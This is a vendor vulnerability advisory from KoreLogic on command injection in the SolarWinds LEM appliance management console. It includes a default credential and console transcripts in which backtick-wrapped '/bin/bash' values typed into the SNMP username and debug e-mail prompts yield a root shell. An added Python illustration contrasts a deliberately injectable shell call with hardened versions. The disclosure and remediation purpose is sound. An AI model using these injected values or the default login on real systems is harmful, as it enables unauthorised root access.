KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection

From: KoreLogic Disclosures <disclosures@korelogic.com>
To: fulldisclosure@seclists.org, bugtraq@securityfocus.com
Message-ID: <8705e2a5-c75a-783f-c6c4-f77d67a8935d@korelogic.com>

Title: Solarwinds LEM Management Shell Escape via Command Injection
Advisory ID: KL-001-2017-007
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt


1. Vulnerability Details

     Affected Vendor: Solarwinds
     Affected Product: Log and Event Manager Virtual Appliance
     Affected Version: v6.3.1
     Platform: Embedded Linux
     CWE Classification: CWE-78: Improper Neutralization of Special
                         Elements used in an OS Command
     Impact: Privileged Access
     Attack vector: SSH

2. Vulnerability Description

     Insufficient input validation in the management interface can
     be leveraged in order to execute arbitrary commands. This can
     lead to (root) shell access to the underlying operating system.

3. Technical Description

     Should an attacker gain access to the SSH console for the
     cmc user, root access to the underlying operating system can be
     achieved. The default password for the cmc user is "password".

     This report details two distinct attack vectors: the username
     input during SNMP setup and the destination email input
     during debug.

   ============
   = SNMP     =
   ============

     This is accomplished by placing `/bin/bash` in the username
     input during SNMP server setup.

     $ ssh cmc@1.3.3.7
     Password:
     Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
     Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6
       //////////////////////////////////////////////////
       ///       SolarWinds Log & Event Manager       ///
       ///                   management console       ///
       //////////////////////////////////////////////////

     Detected VMware Virtual Platform
     Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
     Available commands:
       [ appliance ]  Network, System
       [ manager ]    Upgrade, Debug
       [ service ]    Restrictions, SSH, Snort
       [ ndepth ]     nDepth Configuration/Maintenance
         upgrade      Upgrade this Appliance
         admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
         import       Import a file that can be used from the Admin UI
         help         display this help
         exit         Exit
     cmc > service
     Available commands:
         startssh           Start the SSH Service
         stopssh            Stop the SSH Service
         restartssh         Restart the SSH Service
         restrictssh        Restrict Access to the SSH Service (by IP Address/hostname)
         unrestrictssh      Remove Restrictions on Access to the SSH Service
         snmp               Configure the SNMP Services
         copysnortrules     Copy Snort rules to floppy or network share
         loadsnortrules     Load Snort rules from floppy or network share
         loadsnortbackup    Load Snort rules from backup
         restartsnort       Restart the Snort Service
         enableflow         * Enable the flow Collection Service
         disableflow        Disable the flow Collection Service
         restrictconsole    Restrict Access to the Manager Console (GUI) by IP/hostname
         unrestrictconsole  Remove Restrictions on Access to the Console (GUI)
         restrictreports    Restrict Access to Reports by IP/hostname
         unrestrictreports  Remove Restrictions on Access to Reports
         stopopsec          Stop all running OPSEC LEA client connections
         help               display this help
         exit               Return to main menu

         NOTE: Commands with an asterisk (*) include an automatic manager service restart
     cmc::service > snmp
     SNMP Trap Logging Service is RUNNNING
     Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y

     SNMP Request Service is RUNNNING
     Would you like to STOP the SNMP Request Service? [Y/n] Y

     The SNMP Trap Logging Service is stopped.
     The SNMP Request Service is stopped.
     cmc::service > snmp
     SNMP Trap Logging Service is DISABLED
     Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y

     SNMP Request Service is DISABLED
     Would you like to ENABLE the SNMP Request Service? [Y/n] Y

     Enter the port number to access SNMP on LEM (default: 161):
     Enter the username to access SNMP on LEM (default: orion): `/bin/bash`
     Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):
     Enter the authentication password (default: orion123):
     Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):
     Enter the encryption key (default: orion123):

     cmc@swi-lem:/usr/local/contego$


   ============
   = Debug    =
   ============

     This is accomplished by placing `/bin/bash` in the destination
     email input during debug.

     $ ssh cmc@1.3.3.7
     Password:
     Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
     Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6
       //////////////////////////////////////////////////
       ///       SolarWinds Log & Event Manager       ///
       ///                   management console       ///
       //////////////////////////////////////////////////

     Detected VMware Virtual Platform
     Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
     Available commands:
       [ appliance ]  Network, System
       [ manager ]    Upgrade, Debug
       [ service ]    Restrictions, SSH, Snort
       [ ndepth ]     nDepth Configuration/Maintenance
         upgrade      Upgrade this Appliance
         admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
         import       Import a file that can be used from the Admin UI
         help         display this help
         exit         Exit
     cmc > manager
     Available commands:
         actortoolupgrade   * Upgrade your Managers Actor Tools (CD/floppy)
         archiveconfig      Set your Manager Database Archive Schedule/Settings
         backupconfig       Set your Manager Backup Schedule/Settings
         cleanagentconfig   Reconfigure the agent on this box to a new manager
         configurendepth    * Configure the manager to use an nDepth server.
         confselfsignedcert * Configure the manager to use a self signed certificate
         dbrestart          Restart database
         debug              Send Debugging Information to an Alternate Address
         disabletls         Disable TLS for DB connections
         enabletls          Enable TLS for DB connections
         exportcert         Export the CA certificate for console
         exportcertrequest  Export a certificate request for signing by CA
         hotfix             Install LEM hotfix.
         importcert         * Import a certificate used for console communication
         importl4ca         * Import a CA of the other node in L4 configuration
         licenseupgrade     * Upgrade your Manager License (CD/floppy/network)
         logbackupconfig    Set your Manager Log Backup Schedule/Settings
         resetadmin         Reset the "admin" user password to default
         restart            * Restart Manager Service
         sensortoolupgrade  Upgrade your Manager and Agent Sensor Tools (CD/floppy)
         showlog            Show Manager Log File
         showmanagermem     Show the memory setting of SolarWinds manager
         start              Start Manager Service
         stop               * Stop Manager Service
         support            Send Debugging Information to Tech Support @trigeo.com
         togglehttp         * Enable or disable HTTP (port 80).
         viewsysinfo        Show information about machine and SolarWinds manager
         watchlog           Watch Manager Log File
         exit               Return to main menu

         NOTE: Commands with an asterisk (*) include an automatic manager service restart
     cmc::manager > debug
     Press <enter> to capture debugging information
     You will need to provide an SMTP server or Windows File Sharing Credentials

     Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     .e.sudo: unable to resolve host swi-lem
     sudo: unable to resolve host swi-lem
     .cat: /etc/hosts: No such file or directory
      done.
     sudo: unable to resolve host swi-lem
     E-Mail/Network share/Quit? (e/n/q) e
     E-Mail/Network share/Quit? (e/n/q) e
     Please enter the e-mail recipient:
        (e.g. support@trigeo.com)
     > `/bin/bash >&2`
     Is the e-mail address <`/bin/bash >&2`> correct? <Y/n> Y
     Please enter the name this message should appear from
        (e.g. Someone Important)
     > Test
     Is the name Test correct? <Y/n> Y
     Please enter the e-mail address this message should appear from
        (e.g. someone@trigeo.com)
     > fake@localhost
     Is the e-mail address fake@localhost correct? <Y/n> Y
     Please enter the SMTP server you wish to send mail through
        (e.g. smtp.yournetwork.com)
     > 127.0.0.1
     Is the SMTP server 127.0.0.1 correct? <Y/n> Y
     Please enter the name of your company
        (e.g. Initech, Post Falls branch or Veridian Dynamics)
     > Test
     Is the company Test correct? <Y/n> Y
     Please enter a phone number where you can be reached
        (e.g. 509.555.1234)
     > Test
     Is the number Test correct? <Y/n> Y

     --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
     /tmp # id
     uid=0(root) gid=0(root) groups=0(root)
     --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
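
     The pattern behind both vectors (the SNMP username prompt and the
     debug e-mail recipient prompt), shown as an added illustration that
     is not KoreLogic's or SolarWinds' code; the console's real
     implementation is not reproduced in this advisory. A prompt answer
     is spliced into a command string that a shell parses, so a
     backtick-wrapped value is executed as a command; the hardened form
     validates the answer against an allowlist and passes it as its own
     argv element so no shell ever sees it. `echo` stands in for the
     real SNMP/mail tool, the allowlist patterns are assumptions, and
     the probe string is constructed; the block runs on any POSIX host
     with Python 3.

```python
import re
import shlex
import subprocess

# Constructed stand-in for the appliance's real tooling (not on the page):
# `echo` plays the role of the SNMP or mail command that receives the input.
SETUP_TOOL = "echo"


# --- Vulnerable pattern (CWE-78): the typed answer is pasted into a command
# string that /bin/sh then parses, so `...` and $(...) inside it run as commands.
def vulnerable_snmp_setup(username: str) -> str:
    cmd = f"{SETUP_TOOL} configuring snmp user {username}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# --- Hardened form, layer 1: allowlist validation at the prompt.
# Assumed formats: a conservative SNMPv3 user name and a plain e-mail shape.
SNMP_USER_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def is_valid_snmp_username(value: str) -> bool:
    return SNMP_USER_RE.fullmatch(value) is not None


def is_valid_email(value: str) -> bool:
    return EMAIL_RE.fullmatch(value) is not None


# --- Hardened form, layer 2: pass the value as a separate argv element.
# No shell parses the list, so shell metacharacters are ordinary bytes.
def argv_only_setup(username: str) -> str:
    return subprocess.run(
        [SETUP_TOOL, "configuring", "snmp", "user", username],
        capture_output=True, text=True,
    ).stdout


def hardened_snmp_setup(username: str) -> str:
    # Reject at the prompt, before anything is executed.
    if not is_valid_snmp_username(username):
        raise ValueError("SNMP username rejected: not in allowlist [A-Za-z0-9_.-]{1,32}")
    return argv_only_setup(username)


# --- When a command *string* is unavoidable (e.g. it is handed to a remote
# shell), quote each value so the shell sees a single literal word.
def quoted_command(username: str) -> str:
    return f"{SETUP_TOOL} configuring snmp user {shlex.quote(username)}"


if __name__ == "__main__":
    probe = "`echo INJECTED`"  # constructed, harmless command substitution
    print("vulnerable :", vulnerable_snmp_setup(probe).rstrip())   # INJECTED ran
    print("argv only  :", argv_only_setup(probe).rstrip())         # literal text
    print("quoted     :", quoted_command(probe))                   # single-quoted
    print("allowlist  :", is_valid_snmp_username(probe), is_valid_email("`/bin/bash >&2`"))
```

     The allowlist is the check the SNMP username and debug recipient
     prompts lacked; the argv list removes the command-substitution
     class entirely, and `shlex.quote` is the fallback for the rare case
     where a command string truly must be assembled. The `>&2` in the
     debug vector suggests the console captures the tool's stdout;
     since stderr still reaches the terminal, capturing output is not a
     mitigation.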

4. Mitigation and Remediation Recommendation

     The vendor has released a Hotfix to remediate this
     vulnerability. Hotfix and installation instructions are
     available at:

     https://thwack.solarwinds.com/thread/111223

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     and Hank Leininger of KoreLogic, Inc.

6. Disclosure Timeline

     2017.02.16 - KoreLogic sends vulnerability report and PoC to
                  Solarwinds <psirt@solarwinds.com> using PGP key
                  with fingerprint
                  A86E 0CF6 9665 0C8C 8A7C  C9BA B373 8E9F 951F 918F.
     2017.02.20 - Solarwinds replies that the key is no longer in
                  use, requests alternate communication channel.
     2017.02.22 - KoreLogic submits vulnerability report and PoC to
                  alternate Solarwinds contact.
     2017.02.23 - Solarwinds confirms receipt of vulnerability
                  report.
     2017.04.06 - 30 business days have elapsed since Solarwinds
                  acknowledged receipt of vulnerability details.
     2017.04.11 - Solarwinds releases hotfix and public disclosure.
     2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

